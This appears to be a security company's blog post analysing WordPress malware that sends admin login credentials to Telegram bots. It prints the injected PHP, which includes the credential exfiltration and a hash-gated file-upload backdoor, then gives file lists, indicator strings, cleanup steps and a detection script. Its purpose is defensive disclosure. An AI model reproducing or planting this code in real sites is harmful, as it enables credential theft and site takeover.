WordPress malware using the Telegram API

Panos Kesisis · 1st September 2020 · WordPress, PHP, Website Security

We have noticed a number of WordPress websites affected by new malware that uses the Telegram API to steal private information (the admin username and password): on every successful login it posts the credentials to a Telegram chat, from where they are stored in a remote database.

Here is the malicious code that is being injected (bot tokens redacted):


  try {
      // Runs after WordPress' normal login check and, for every valid username/password
      // pair, sends the credentials, visitor IP and host name to a Telegram bot.
      $bajatax_x9 = apply_filters( 'wp_authenticate_user', $user, $password );
      if ( wp_check_password( $password, $bajatax_x9->user_pass, $bajatax_x9->ID ) ) {
          if ( ! empty( $username ) and ! empty( $password ) ) {
              $message852 = "bajatax|:|:|" . $username . "|:|:|" . $password . "|:|:|" . $_SERVER['REMOTE_ADDR'] . "|:|:|" . $_SERVER['SERVER_NAME'] . "|:|:|";
              file_get_contents( "https://api.telegram.org/xxxxxxxxx:AAEg61uHS7H7lRnf9jA27cmahncSl8NMuvI/sendMessage?chat_id=1110165405&text=" . urlencode( $message852 ) . "" );
          }
      }
  } catch ( Exception $e ) {
      // On any error, report back to a second bot (the two calls are cut off in the captured sample).
      if ( function_exists( "file_get_contents" ) ) {
          try {
              file_get_contents("https://api.telegram.org/xxxxxxxxx:AAE1-wpQyYquqvB7wOeBzzmPafEp0d81e6c/sendMessage?chat_id=1110165405&text=" . urlencode$
              file_get_contents("https://api.telegram.org/xxxxxxxxx:AAE1-wpQyYquqvB7wOeBzzmPafEp0d81e6c/sendMessage?chat_id=1110165405&text=" . urlencode$
          } catch ( Exception $e2 ) {}
      }
  }
  try {
      // Upload backdoor: a POST whose token_admin hashes to the hard-coded value
      // writes the uploaded file one directory above the infected script.
      if ( $_POST['action'] == "wp_ajax_try_2020_v2" ) {
          if ( ! empty( $_FILES['file'] ) and md5( md5( md5( $_POST['token_admin'] ) ) ) == "015c38c46597c483b6186e4a40aad4bf" ) {
              @move_uploaded_file( $_FILES['file']['tmp_name'], "../" . $_FILES['file']['name'] );
              echo " file name : " . $_FILES['file']['name'];
          } else {
              die(0);
          }
          exit();
      }
  } catch ( Exception $e ) {
      // Same error reporting as above (again cut off in the captured sample).
      if ( function_exists( "file_get_contents" ) ) {
          try {
              file_get_contents("https://api.telegram.org/xxxxxxxx:AAE1-wpQyYquqvB7wOeBzzmPafEp0d81e6c/sendMessage?chat_id=1110165405&text=" . urlencode$
              file_get_contents("https://api.telegram.org/xxxxxxxxx:AAE1-wpQyYquqvB7wOeBzzmPafEp0d81e6c/sendMessage?chat_id=1110165405&text=" . urlencode$
          } catch ( Exception $e2 ) {}
      }
  }


So far the malware appears to infect WordPress core files and the "File Manager" and "WooCommerce" plugins, including the latest versions of WordPress (5.5) and WooCommerce (4.4.1). The files that appear to be affected are:

  • wp-includes/user.php
  • wp-admin/admin-ajax.php
  • wp-file-manager/lib/files/HhGFXU.php (and other randomly named .php files)
  • woocommerce/includes/wc-user-functions.php
  • woocommerce/includes/class-wc-form-handler.php

Strings that can help determine whether your site is compromised are:

  • "bajatax"
  • "api.telegram.org"

Since the code above is not hashed or obfuscated, it is extremely difficult for a security plugin such as Wordfence or Sucuri to detect it by scanning, so manual intervention is advised.

Steps to resolve

The basic steps to resolve this are to replace all WordPress core files with clean wp-admin and wp-includes folders and to do a fresh reinstall of the WooCommerce and WP File Manager plugins. Always take a backup before attempting this.

Also, there should be no references to those strings anywhere in your website's files or database (the only exception is the second string when you use the official Telegram plugin).

Lastly, it is recommended to check for newly created WordPress users that may have been injected into the database as well.
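The checks above (search files for the two strings, verify core and plugin files, search the database, review recently registered users) as a script; this is an added example, not code from the original post. It assumes a POSIX shell with find and grep, and WP-CLI ("wp") only for the wp_cli_checks function; the sample tree it builds is constructed and carries only the indicator strings, not the malware.

```shell
#!/bin/sh
# Added example: scan a WordPress tree for the indicator strings the post lists and,
# where WP-CLI is available, run the checksum, database and user checks a cleanup starts with.
# Assumed tools: POSIX sh, find, grep (WP-CLI "wp" only for wp_cli_checks).

# Indicator strings from the post. "api.telegram.org" is legitimate only when the
# official Telegram plugin is installed, so review every hit by hand.
INDICATORS='bajatax|api\.telegram\.org'

# Print "file:line:content" for every PHP file under $1 that contains an indicator.
scan_wp_tree() {
    find "$1" -type f -name '*.php' -exec grep -nHE "$INDICATORS" {} + 2>/dev/null || true
}

# Number of distinct files under $1 that contain an indicator.
count_infected_files() {
    scan_wp_tree "$1" | cut -d: -f1 | sort -u | wc -l | tr -d ' '
}

# Checks that need WP-CLI inside a real install ($1 = WordPress root).
wp_cli_checks() {
    wp --path="$1" core verify-checksums           # modified core files, e.g. wp-includes/user.php
    wp --path="$1" plugin verify-checksums --all   # modified plugin files (WooCommerce, File Manager)
    wp --path="$1" db search 'bajatax'             # indicators stored in the database
    wp --path="$1" db search 'api.telegram.org'
    wp --path="$1" user list --orderby=registered --order=desc --fields=ID,user_login,user_registered
}

# Constructed sample tree (not a real install): one clean file and two files that
# carry only the indicator strings. Prints the directory path.
make_sample_tree() {
    d=$(mktemp -d)
    mkdir -p "$d/wp-includes" "$d/wp-content/plugins/woocommerce/includes"
    printf '<?php\nfunction wp_check_password($p, $h, $id) { return false; }\n' \
        > "$d/wp-includes/pluggable.php"
    printf '<?php\n$message852 = "bajatax|:|:|" . $username;\n' \
        > "$d/wp-includes/user.php"
    printf '<?php\n@file_get_contents("https://api.telegram.org/bot<TOKEN>/sendMessage");\n' \
        > "$d/wp-content/plugins/woocommerce/includes/wc-user-functions.php"
    echo "$d"
}

# Usage: ./scan.sh /var/www/html
if [ -n "${1:-}" ]; then
    scan_wp_tree "$1"
fi
```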

As always, we're here to help in case you need any assistance with cleaning your website and implementing additional security measures. If your site has been infected, feel free to contact us and we can help ASAP.

Also, make sure to follow us on Twitter for future updates.